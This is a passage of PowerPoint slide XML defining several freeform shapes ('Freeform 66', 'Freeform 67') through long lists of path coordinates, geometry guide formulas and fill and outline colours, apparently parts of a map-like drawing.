                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="139"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36334" name="Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4326" y="2577"/>
                <a:ext cx="118" cy="144"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 86 w 118"/>
                  <a:gd name="T1" fmla="*/ 134 h 144"/>
                  <a:gd name="T2" fmla="*/ 87 w 118"/>
                  <a:gd name="T3" fmla="*/ 124 h 144"/>
                  <a:gd name="T4" fmla="*/ 83 w 118"/>
                  <a:gd name="T5" fmla="*/ 115 h 144"/>
                  <a:gd name="T6" fmla="*/ 74 w 118"/>
                  <a:gd name="T7" fmla="*/ 102 h 144"/>
                  <a:gd name="T8" fmla="*/ 72 w 118"/>
                  <a:gd name="T9" fmla="*/ 88 h 144"/>
                  <a:gd name="T10" fmla="*/ 64 w 118"/>
                  <a:gd name="T11" fmla="*/ 78 h 144"/>
                  <a:gd name="T12" fmla="*/ 62 w 118"/>
                  <a:gd name="T13" fmla="*/ 72 h 144"/>
                  <a:gd name="T14" fmla="*/ 54 w 118"/>
                  <a:gd name="T15" fmla="*/ 69 h 144"/>
                  <a:gd name="T16" fmla="*/ 49 w 118"/>
                  <a:gd name="T17" fmla="*/ 73 h 144"/>
                  <a:gd name="T18" fmla="*/ 44 w 118"/>
                  <a:gd name="T19" fmla="*/ 79 h 144"/>
                  <a:gd name="T20" fmla="*/ 38 w 118"/>
                  <a:gd name="T21" fmla="*/ 77 h 144"/>
                  <a:gd name="T22" fmla="*/ 29 w 118"/>
                  <a:gd name="T23" fmla="*/ 75 h 144"/>
                  <a:gd name="T24" fmla="*/ 18 w 118"/>
                  <a:gd name="T25" fmla="*/ 87 h 144"/>
                  <a:gd name="T26" fmla="*/ 14 w 118"/>
                  <a:gd name="T27" fmla="*/ 83 h 144"/>
                  <a:gd name="T28" fmla="*/ 15 w 118"/>
                  <a:gd name="T29" fmla="*/ 76 h 144"/>
                  <a:gd name="T30" fmla="*/ 19 w 118"/>
                  <a:gd name="T31" fmla="*/ 62 h 144"/>
                  <a:gd name="T32" fmla="*/ 17 w 118"/>
                  <a:gd name="T33" fmla="*/ 51 h 144"/>
                  <a:gd name="T34" fmla="*/ 11 w 118"/>
                  <a:gd name="T35" fmla="*/ 53 h 144"/>
                  <a:gd name="T36" fmla="*/ 6 w 118"/>
                  <a:gd name="T37" fmla="*/ 51 h 144"/>
                  <a:gd name="T38" fmla="*/ 7 w 118"/>
                  <a:gd name="T39" fmla="*/ 43 h 144"/>
                  <a:gd name="T40" fmla="*/ 6 w 118"/>
                  <a:gd name="T41" fmla="*/ 38 h 144"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 35 h 144"/>
                  <a:gd name="T44" fmla="*/ 5 w 118"/>
                  <a:gd name="T45" fmla="*/ 31 h 144"/>
                  <a:gd name="T46" fmla="*/ 12 w 118"/>
                  <a:gd name="T47" fmla="*/ 22 h 144"/>
                  <a:gd name="T48" fmla="*/ 17 w 118"/>
                  <a:gd name="T49" fmla="*/ 20 h 144"/>
                  <a:gd name="T50" fmla="*/ 25 w 118"/>
                  <a:gd name="T51" fmla="*/ 23 h 144"/>
                  <a:gd name="T52" fmla="*/ 28 w 118"/>
                  <a:gd name="T53" fmla="*/ 18 h 144"/>
                  <a:gd name="T54" fmla="*/ 25 w 118"/>
                  <a:gd name="T55" fmla="*/ 11 h 144"/>
                  <a:gd name="T56" fmla="*/ 24 w 118"/>
                  <a:gd name="T57" fmla="*/ 4 h 144"/>
                  <a:gd name="T58" fmla="*/ 31 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 144"/>
                  <a:gd name="T60" fmla="*/ 39 w 118"/>
                  <a:gd name="T61" fmla="*/ 10 h 144"/>
                  <a:gd name="T62" fmla="*/ 45 w 118"/>
                  <a:gd name="T63" fmla="*/ 22 h 144"/>
                  <a:gd name="T64" fmla="*/ 51 w 118"/>
                  <a:gd name="T65" fmla="*/ 31 h 144"/>
                  <a:gd name="T66" fmla="*/ 57 w 118"/>
                  <a:gd name="T67" fmla="*/ 32 h 144"/>
                  <a:gd name="T68" fmla="*/ 63 w 118"/>
                  <a:gd name="T69" fmla="*/ 27 h 144"/>
                  <a:gd name="T70" fmla="*/ 68 w 118"/>
                  <a:gd name="T71" fmla="*/ 32 h 144"/>
                  <a:gd name="T72" fmla="*/ 75 w 118"/>
                  <a:gd name="T73" fmla="*/ 44 h 144"/>
                  <a:gd name="T74" fmla="*/ 71 w 118"/>
                  <a:gd name="T75" fmla="*/ 48 h 144"/>
                  <a:gd name="T76" fmla="*/ 65 w 118"/>
                  <a:gd name="T77" fmla="*/ 47 h 144"/>
                  <a:gd name="T78" fmla="*/ 61 w 118"/>
                  <a:gd name="T79" fmla="*/ 51 h 144"/>
                  <a:gd name="T80" fmla="*/ 63 w 118"/>
                  <a:gd name="T81" fmla="*/ 56 h 144"/>
                  <a:gd name="T82" fmla="*/ 76 w 118"/>
                  <a:gd name="T83" fmla="*/ 65 h 144"/>
                  <a:gd name="T84" fmla="*/ 86 w 118"/>
                  <a:gd name="T85" fmla="*/ 75 h 144"/>
                  <a:gd name="T86" fmla="*/ 102 w 118"/>
                  <a:gd name="T87" fmla="*/ 98 h 144"/>
                  <a:gd name="T88" fmla="*/ 110 w 118"/>
                  <a:gd name="T89" fmla="*/ 105 h 144"/>
                  <a:gd name="T90" fmla="*/ 114 w 118"/>
                  <a:gd name="T91" fmla="*/ 110 h 144"/>
                  <a:gd name="T92" fmla="*/ 113 w 118"/>
                  <a:gd name="T93" fmla="*/ 115 h 144"/>
                  <a:gd name="T94" fmla="*/ 118 w 118"/>
                  <a:gd name="T95" fmla="*/ 122 h 144"/>
                  <a:gd name="T96" fmla="*/ 117 w 118"/>
                  <a:gd name="T97" fmla="*/ 133 h 144"/>
                  <a:gd name="T98" fmla="*/ 109 w 118"/>
                  <a:gd name="T99" fmla="*/ 137 h 144"/>
                  <a:gd name="T100" fmla="*/ 104 w 118"/>
                  <a:gd name="T101" fmla="*/ 135 h 144"/>
                  <a:gd name="T102" fmla="*/ 97 w 118"/>
                  <a:gd name="T103" fmla="*/ 135 h 144"/>
                  <a:gd name="T104" fmla="*/ 95 w 118"/>
                  <a:gd name="T105" fmla="*/ 139 h 144"/>
                  <a:gd name="T106" fmla="*/ 97 w 118"/>
                  <a:gd name="T107" fmla="*/ 142 h 144"/>
                  <a:gd name="T108" fmla="*/ 95 w 118"/>
                  <a:gd name="T109" fmla="*/ 144 h 144"/>
                  <a:gd name="T110" fmla="*/ 89 w 118"/>
                  <a:gd name="T111" fmla="*/ 142 h 144"/>
                  <a:gd name="T112" fmla="*/ 80 w 118"/>
                  <a:gd name="T113" fmla="*/ 139 h 144"/>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18"/>
                  <a:gd name="T172" fmla="*/ 0 h 144"/>
                  <a:gd name="T173" fmla="*/ 118 w 118"/>
                  <a:gd name="T174" fmla="*/ 144 h 144"/>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18" h="144">
                    <a:moveTo>
                      <a:pt x="80" y="139"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="86" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="139"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36335" name="Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4201" y="2474"/>
                <a:ext cx="141" cy="308"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 141"/>
                  <a:gd name="T1" fmla="*/ 112 h 308"/>
                  <a:gd name="T2" fmla="*/ 16 w 141"/>
                  <a:gd name="T3" fmla="*/ 95 h 308"/>
                  <a:gd name="T4" fmla="*/ 20 w 141"/>
                  <a:gd name="T5" fmla="*/ 77 h 308"/>
                  <a:gd name="T6" fmla="*/ 32 w 141"/>
                  <a:gd name="T7" fmla="*/ 79 h 308"/>
                  <a:gd name="T8" fmla="*/ 40 w 141"/>
                  <a:gd name="T9" fmla="*/ 54 h 308"/>
                  <a:gd name="T10" fmla="*/ 48 w 141"/>
                  <a:gd name="T11" fmla="*/ 33 h 308"/>
                  <a:gd name="T12" fmla="*/ 70 w 141"/>
                  <a:gd name="T13" fmla="*/ 22 h 308"/>
                  <a:gd name="T14" fmla="*/ 77 w 141"/>
                  <a:gd name="T15" fmla="*/ 15 h 308"/>
                  <a:gd name="T16" fmla="*/ 83 w 141"/>
                  <a:gd name="T17" fmla="*/ 3 h 308"/>
                  <a:gd name="T18" fmla="*/ 93 w 141"/>
                  <a:gd name="T19" fmla="*/ 6 h 308"/>
                  <a:gd name="T20" fmla="*/ 102 w 141"/>
                  <a:gd name="T21" fmla="*/ 16 h 308"/>
                  <a:gd name="T22" fmla="*/ 102 w 141"/>
                  <a:gd name="T23" fmla="*/ 44 h 308"/>
                  <a:gd name="T24" fmla="*/ 90 w 141"/>
                  <a:gd name="T25" fmla="*/ 57 h 308"/>
                  <a:gd name="T26" fmla="*/ 86 w 141"/>
                  <a:gd name="T27" fmla="*/ 78 h 308"/>
                  <a:gd name="T28" fmla="*/ 95 w 141"/>
                  <a:gd name="T29" fmla="*/ 76 h 308"/>
                  <a:gd name="T30" fmla="*/ 107 w 141"/>
                  <a:gd name="T31" fmla="*/ 90 h 308"/>
                  <a:gd name="T32" fmla="*/ 117 w 141"/>
                  <a:gd name="T33" fmla="*/ 95 h 308"/>
                  <a:gd name="T34" fmla="*/ 117 w 141"/>
                  <a:gd name="T35" fmla="*/ 110 h 308"/>
                  <a:gd name="T36" fmla="*/ 128 w 141"/>
                  <a:gd name="T37" fmla="*/ 121 h 308"/>
                  <a:gd name="T38" fmla="*/ 140 w 141"/>
                  <a:gd name="T39" fmla="*/ 120 h 308"/>
                  <a:gd name="T40" fmla="*/ 130 w 141"/>
                  <a:gd name="T41" fmla="*/ 134 h 308"/>
                  <a:gd name="T42" fmla="*/ 123 w 141"/>
                  <a:gd name="T43" fmla="*/ 140 h 308"/>
                  <a:gd name="T44" fmla="*/ 109 w 141"/>
                  <a:gd name="T45" fmla="*/ 149 h 308"/>
                  <a:gd name="T46" fmla="*/ 91 w 141"/>
                  <a:gd name="T47" fmla="*/ 154 h 308"/>
                  <a:gd name="T48" fmla="*/ 89 w 141"/>
                  <a:gd name="T49" fmla="*/ 169 h 308"/>
                  <a:gd name="T50" fmla="*/ 88 w 141"/>
                  <a:gd name="T51" fmla="*/ 179 h 308"/>
                  <a:gd name="T52" fmla="*/ 99 w 141"/>
                  <a:gd name="T53" fmla="*/ 195 h 308"/>
                  <a:gd name="T54" fmla="*/ 105 w 141"/>
                  <a:gd name="T55" fmla="*/ 209 h 308"/>
                  <a:gd name="T56" fmla="*/ 101 w 141"/>
                  <a:gd name="T57" fmla="*/ 223 h 308"/>
                  <a:gd name="T58" fmla="*/ 105 w 141"/>
                  <a:gd name="T59" fmla="*/ 243 h 308"/>
                  <a:gd name="T60" fmla="*/ 110 w 141"/>
                  <a:gd name="T61" fmla="*/ 261 h 308"/>
                  <a:gd name="T62" fmla="*/ 118 w 141"/>
                  <a:gd name="T63" fmla="*/ 282 h 308"/>
                  <a:gd name="T64" fmla="*/ 100 w 141"/>
                  <a:gd name="T65" fmla="*/ 307 h 308"/>
                  <a:gd name="T66" fmla="*/ 105 w 141"/>
                  <a:gd name="T67" fmla="*/ 287 h 308"/>
                  <a:gd name="T68" fmla="*/ 102 w 141"/>
                  <a:gd name="T69" fmla="*/ 281 h 308"/>
                  <a:gd name="T70" fmla="*/ 96 w 141"/>
                  <a:gd name="T71" fmla="*/ 251 h 308"/>
                  <a:gd name="T72" fmla="*/ 88 w 141"/>
                  <a:gd name="T73" fmla="*/ 216 h 308"/>
                  <a:gd name="T74" fmla="*/ 84 w 141"/>
                  <a:gd name="T75" fmla="*/ 205 h 308"/>
                  <a:gd name="T76" fmla="*/ 75 w 141"/>
                  <a:gd name="T77" fmla="*/ 191 h 308"/>
                  <a:gd name="T78" fmla="*/ 69 w 141"/>
                  <a:gd name="T79" fmla="*/ 204 h 308"/>
                  <a:gd name="T80" fmla="*/ 52 w 141"/>
                  <a:gd name="T81" fmla="*/ 217 h 308"/>
                  <a:gd name="T82" fmla="*/ 48 w 141"/>
                  <a:gd name="T83" fmla="*/ 213 h 308"/>
                  <a:gd name="T84" fmla="*/ 43 w 141"/>
                  <a:gd name="T85" fmla="*/ 210 h 308"/>
                  <a:gd name="T86" fmla="*/ 34 w 141"/>
                  <a:gd name="T87" fmla="*/ 214 h 308"/>
                  <a:gd name="T88" fmla="*/ 37 w 141"/>
                  <a:gd name="T89" fmla="*/ 192 h 308"/>
                  <a:gd name="T90" fmla="*/ 30 w 141"/>
                  <a:gd name="T91" fmla="*/ 162 h 308"/>
                  <a:gd name="T92" fmla="*/ 21 w 141"/>
                  <a:gd name="T93" fmla="*/ 160 h 308"/>
                  <a:gd name="T94" fmla="*/ 25 w 141"/>
                  <a:gd name="T95" fmla="*/ 153 h 308"/>
                  <a:gd name="T96" fmla="*/ 15 w 141"/>
                  <a:gd name="T97" fmla="*/ 146 h 308"/>
                  <a:gd name="T98" fmla="*/ 11 w 141"/>
                  <a:gd name="T99" fmla="*/ 139 h 308"/>
                  <a:gd name="T100" fmla="*/ 0 w 141"/>
                  <a:gd name="T101" fmla="*/ 129 h 308"/>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141"/>
                  <a:gd name="T154" fmla="*/ 0 h 308"/>
                  <a:gd name="T155" fmla="*/ 141 w 141"/>
                  <a:gd name="T156" fmla="*/ 308 h 308"/>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141" h="308">
                    <a:moveTo>
                      <a:pt x="6" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="112"/>
